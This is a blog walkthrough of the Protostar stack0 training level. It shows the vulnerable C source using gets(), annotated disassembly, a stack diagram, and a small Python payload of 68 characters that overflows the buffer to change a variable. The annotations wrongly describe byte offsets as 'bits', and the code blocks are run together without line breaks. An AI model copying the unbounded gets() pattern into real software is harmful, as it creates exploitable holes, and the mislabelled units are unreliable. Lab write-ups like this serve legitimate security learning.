# Binary Exploitation Protostar Stack0 - Walkthrough

Posted by Suraj Singh on April 04, 2018 · 6 mins read
Hello Guyz,

In This Post, I am going to show you how we can win protostar stack0 level. basically, here Our main Goal is To Understand How A Program Practically Works, And How Can We Understand Every Concept Very Clearly.

#### Before Starting This Walkthrough. I want to highlight Few Points.

• I'm not the creator of protostar war game. I am just a player.
• Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
• For Practical Hint, Check YouTube Video Given Below.

### Source Code :

 ` 1 2 3 4 5 6 7 8 9101112131415161718` `#include #include #include int main(int argc, char **argv){ volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); }}`

### Disassembly Of Main Function (Using GDB)

`########################################################################################################                [ System Has Created Space For 60 Bits In hEx and 96 in Decimal Space On Stack]########################################################################################################[-------------------------------------code-------------------------------------]   0x80483f5 <main+1>: mov    ebp,esp                          <<=== Save Base Pointer Onto Stack    0x80483f7 <main+3>: and    esp,0xfffffff0   0x80483fa <main+6>: sub    esp,0x60                         <<=== This Instruction to Create Space of 96-Bits in Stack,=> 0x80483fd <main+9>: mov    DWORD PTR [esp+0x5c],0x0         <<=== Here, This Instruction is to Insert 0 Into 92-96 Bits,   0x8048405 <main+17>: lea    eax,[esp+0x1c]                   <<=== This Instruction is To Copy address of 28 bits starting                                                                       point from 96 bits Into EAX registers From There, move it                                                                       to stack so That it will work as a argument for get command.   0x8048409 <main+21>: mov    DWORD PTR [esp],eax              <<=== Copy Eax into stack   0x804840c <main+24>: call   0x804830c <gets@plt>             <<=== Perform Get Command   0x8048411 <main+29>: mov    eax,DWORD PTR [esp+0x5c]         <<=== Get Value Of 92-96 bits and move it to EAX register`

### Situation On Stack

`0                        28                                                      92        96 ============================================================================================        Other Things     |  Buffer(64)                                           | modified |  ============================================================================================                         ^                                                            ^                         |                                                            |                       Get Overwrites from here                                       +                                                                                  Target Area`

### Exploit

`#!/usr/bin/python# Total Size Of Buffer In Stack 60c# 0x80483fa <main+6>: sub    esp,0x60 ==> 96 In Decimal# 0x8048405 <main+17>: lea    eax,[esp+0x1c] # 0x804840c <main+24>: call   0x804830c <gets@plt> # 0x80483fd <main+9>: mov    DWORD PTR [esp+0x5c],0x0payload = 'a'*64             # Buffer Variable Valuepayload+= 'b'*4              # Modified Variable Value# ./bin/stack0 < tmpprint payload`